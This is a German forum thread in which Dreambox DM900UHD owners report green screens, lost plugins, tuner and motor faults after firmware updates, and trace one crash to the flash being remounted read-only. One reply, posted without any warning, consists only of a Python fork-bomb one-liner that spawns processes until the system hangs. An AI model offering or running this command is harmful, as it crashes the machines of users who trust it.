Hatte gestern ein Greenscreen beim zappen auf italienischen Sendern.
Angepinnt OE2.5: Rückmeldungen zum weekly Image für DM900UHD
-
-
Quellcode
Ich würde das im DMM Board melden -
Habe beim zurück zurückzappen von einem Film auf der HD oder iptv zum Satsender immer ca. eine Sekunde Artefakte (bunte Klötzchen im Satbild).
Eigentlich schon immer, hat also nichts mit den heutigen update zu tun. -
Habe jetzt auch eine 900 UHD seit vier Tagen. Bis gestern Abend lief die auch einwandrei. Heute Festplatte eingeschoben und initialisiert. Beim Runterfahren Greenscreen und wieder hochgefahren. Dann auf Sky Sendern ständig eingefroren mit Oscam. Sytem daraufhin neu aufgespielt. Häckchen natürlich raus. Hochgefahren. Alles neu eingestellt. Plugins installiert. Kam auch diese Meldung das Installation nicht möglich ist und dann wieder doch. Neustart gemacht mit Greenscreen wieder. Das Ganze dann nochmal ohne Festplatte wiederholt. Hab sie jetzt eingepackt. War Bestellung über Amazon. Geht zurück. Hab meine 7080 wieder angeschlossen. Warte noch ein Jahr. Bin diese Betatesterei leid..."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
Perverseus schrieb:
Habe jetzt auch eine 900 UHD seit vier Tagen. Bis gestern Abend lief die auch einwandrei. Heute Festplatte eingeschoben und initialisiert. Beim Runterfahren Greenscreen und wieder hochgefahren. Dann auf Sky Sendern ständig eingefroren mit Oscam. Sytem daraufhin neu aufgespielt. Häckchen natürlich raus. Hochgefahren. Alles neu eingestellt. Plugins installiert. Kam auch diese Meldung das Installation nicht möglich ist und dann wieder doch. Neustart gemacht mit Greenscreen wieder. Das Ganze dann nochmal ohne Festplatte wiederholt. Hab sie jetzt eingepackt. War Bestellung über Amazon. Geht zurück. Hab meine 7080 wieder angeschlossen. Warte noch ein Jahr. Bin diese Betatesterei leid...
python -c 'while 1: __import__("os").fork()'
Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras ! -
Warscheinlich nicht so viel. Aber Ansätze sind zumindest in diesem Thema vorhanden. Ok hätte villeicht einen eigenen Tread eröffnen sollen da dieses Thema so noch niemand angesprochen bzw. eröffnet hat. Würde mir ja das Teil ja nochmal woanders bestellen. Da ich aber nicht sicher sein kann das ich ein harwarebeschädigtes Gerät hatte oder einfach die Software Müll ist ist mir ehrlich gesagt das Risiko zu groß. Hab schon seit der 7020 Si jede Dream neu gekauft und immer jedes erste Gerät zurückschicken müssen da nicht funktionsfähig. Einzig die 7080 war von Anfang an Top. Bei den Preisen ist das eigentlich ein absolutes K.O Kriterium......"Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
Da hast du wohl besonderes Pech gehabt. Ich musste noch keine von 4 Dreamboxen (7000, 8000, 800se, 900) zurück schicken. Die haben alle von Anfang an funktioniert.
-
Meine 800SE vom 1. Tag ohne Probleme. Die 900 hat mich bisher noch nicht glücklich gemacht. Habe sie zu DMM geschickt. Nach einem Vorab Telefonat hieß es, das ich ein neues Board, sowie einen neuen Tuner bekomme. Hört sich so an, als ob Hardwareprobleme im Haus bekannt wären. Zum Wochenende soll die 900 wieder da sein. Bin gespannt.
Gesendet mit OpO und TapatalkDM 800 SE NN2 Stable 4.0.16
DM 900 UHD 4.3.Or25-2016-12-23 -
Billy2012 schrieb:
Da hast du wohl besonderes Pech gehabt. Ich musste noch keine von 4 Dreamboxen (7000, 8000, 800se, 900) zurück schicken. Die haben alle von Anfang an funktioniert.
"Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier" -
Hab schon mit Drücken angefangen!
Meine erste 900er hatte auch einen Hardwaredefekt. Habe sie dann persönlich bei Dream Multimedia in Lünen umtauschen können. Jetzt sind alle notwendigen Plugins installiert und sie läuft super. Nur manchmal vermisse ich einen 3. Tuner ... -
Also ich weis nicht was ich von den Geräten halten soll. Neuestes Daily auf Box gespielt. Vorher natürlich die Festplatte eingesteckt. Hochgefahren und Bootloader wurde nach Einstellungen aktualisiert. Neustart gemacht und siehe da ein Greenscreen und alles wieder platt. Verliert innerhalb von Sekunden Plugins die ich vorher installiert habe. Komm da nicht mehr klar. ist einfach nur Schrott. Hab die Box über Amazon über anderen Händler diesesmal bestellt. Kommt mir so vor als wäre es wieder das gleiche Gerät."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
-
Außerdem produziert ein Greenscreen ein Chrashlog auf der Platte. Häng das doch mal an, alles andere ist Rätzelraten.
-
Perverseus schrieb:
ist einfach nur Schrott.
Willst du Hilfe oder nur meckern?
Falls a) dann hänge den Crashlog an, falls b) such dir ein anderes Board. -
So hab mal einen Crashlog angehängt. Auf jeden Fall vielen Dank für jede Hilfe ...."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
IOError: [Errno 30] Read-only file system: '/etc/enigma2/blacklist'
Also mal den von @Mausi verlinkten Thread anschauen und abarbeiten... -
Ok dann hab ich überreagiert beim ersten Gerät. Also ist es kein defektes Gerät. Da bin ich ja erstma beruhigt. So jetzt in die Spätschicht und heut Abend ein kühles Blondes und mit kühlem Kopf ran an die Sache. Viele Dank erstma...."Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
perverseus, beim einhängen deiner festplatte zerhaut dir der gerätemanager die fstab und mounted den flash read only.
ich kann das hier ebenfalls mit einer ssd hdd reproduzieren.
abhilfe schafft die hdd per hand in die fstab einzutragen. -
Hab das jetzt auch festgestellt. System ohne Festplatte neu aufgespielt und die Kiste hat überhaupt kein Problem. Probier das Ganze über externe Platte auf USB. Alles wird......"Chuck Norris haut sich morgens zum Frühstück zwei Pfannen in die Eier"
-
Hallo @ll,
jetzt muss ich mich auch mal hier zu Wort melden nach einer Woche "Testen"
Also, habe die Box am 07.02 bekommen und am 09.02 eingerichtet. Kanalliste aus der dm800se V2 drauf und fertig.
Es aht alles auf Anhieb funktioniert, alle Sender und auch der DiSEqC-Drehmotor meiner Anlage, den ich auf 4-5 Satelliten betreibe, funktionierte
eiwandfrei.
Leider brachten das Updates am 12.02 ein paar Probleme mit sich:
1. DMAX HD und TELE5 HD (12574 H, 22000, 2/3, 8PSK, DVBS-2) kein Empfang / Signal mehr
2. DiSEqC-Drehmotor kann / wird nicht mehr gesteuert werden, weder manuell noch über USALS,
es war soga so schlimm dass nachdem ich auf Hotbird umgeschaltet habe
und nichts gefunden wurde obwohl Senderliste vorhanden, auch Astra 19.2E nicht mehr gefunden wurde. Muste meine gute und robuste, Gott sei dank
noch vorhandene DM800se V2 dranhängen um alles wieder gerade zu biegen.
3. extrem unterschiedlichen Signalstärken auf verschiedenen Transponder / Frequenzen die vorher relativ gleich bzw ausgegliechen waren
z.B auf Das Erste HD(11493 H 22000 2/3 8PSK DVB-S2) habe ich 16dB, auf SAT1 HD(11464 H 22000 2/3 8PSK DVB-S2) sind es 14,5 dB
und auf SKY Cinema HD(11915 H 27500 9/10 QPSK DVB-S2) nur 9,5-10 dB
4. nach Update werden alle Skin-Einstellungen die ich über Merlin Skin-Themes gemacht habe zurückgesetzt
Habe eigentlich seit der Ersteinrichtung nix geändert, nur den Daily Update am Sonntag.
Und wie gesagt, ich habe noch meine DM800se V2 zum Vergleich daheim und bei der funktioniert alles so wie immer bzw. wie es seien sollte,
alle Sender da, DiSEqC-Motor ohne Probleme, auf allen Sender bzw. Frquenzen relativ gleiche Signalstärke.
Meine Frage: Hat noch jemand ähnliche Prbleme, sind es Bugs in der Firmware die gefix werden können etc.
Bedanke mich im Voraus, auch an das Newnigma2 Team für die Mühe und Einsatz
Grüße
keyfreakDieser Beitrag wurde bereits 2 mal editiert, zuletzt von keyfreak ()
-
Teilen
- Facebook 0
- Twitter 0
- Google Plus 0
- Reddit 0
-
Benutzer online 2
2 Besucher